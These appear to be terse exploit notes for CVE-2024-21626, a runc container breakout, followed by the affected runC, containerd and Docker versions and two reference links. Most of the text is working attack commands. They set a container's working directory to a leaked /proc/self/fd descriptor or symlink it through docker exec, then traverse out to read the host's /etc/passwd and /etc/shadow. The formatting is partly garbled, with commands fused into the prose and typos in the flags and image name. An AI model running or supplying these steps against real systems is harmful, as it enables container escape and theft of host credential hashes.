docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
- Important is to put
-w /proc/self/fd/8\ - Access the host filesystem using
cat ../../../../../../../../../etc/passwdinside the container
docker run --name cve-2024-21626 --rm --it debian:bootworm- Inside container -
ln -sf /proc/self/fd/7/ /foo - Inside container -
ln -sf /proc/self/fd/8/ /bar docker exec -it -w /bar cve-2024-21626 sleep 120- Inside container -
ls -F /proc - Inside container -
cat /proc/9/cmdline(find PID of thesleepcommand) - Inside container -
cat /proc/9/cwd/../../../../../etc/shadow
- runC: >= 1.0.0-rc93 and <= 1.1.11.
- containerd: >= 1.4.7 and <= 1.6.27, and >= 1.7.0 a <= 1.7.12.
- Docker: fixed in 25.0.2
https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626